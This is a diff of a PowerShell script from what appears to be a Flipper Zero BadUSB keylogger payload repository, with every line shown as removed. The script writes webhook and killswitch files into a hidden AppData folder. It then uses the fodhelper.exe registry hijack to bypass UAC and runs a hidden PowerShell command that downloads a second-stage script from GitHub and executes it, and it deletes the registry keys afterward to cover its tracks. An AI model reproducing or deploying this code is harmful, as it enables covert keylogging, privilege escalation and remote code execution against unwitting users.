■ ■ ■ ■ ■ ■
Payloads/Flip-Keylogger/keylogger - Copy.ps1
1 | | - | if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; |
2 | | - | echo $dc > "$env:appdata\-locker\wh.txt"; |
3 | | - | echo $log > "$env:appdata\-locker\log.txt"; |
4 | | - | echo $ks > "$env:appdata\-locker\killswitch.txt"; |
5 | | - | |
6 | | - | function s1 { |
7 | | - | $user = "$env:COMPUTERNAME\$env:USERNAME" |
8 | | - | $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user |
9 | | - | if($isAdmin){ |
10 | | - | $259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; |
11 | | - | reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; |
12 | | - | |
13 | | - | } |
14 | | - | else{ |
15 | | - | Break |
16 | | - | } |
17 | | - | } |
18 | | - | |
19 | | - | s1 |
20 | | - | |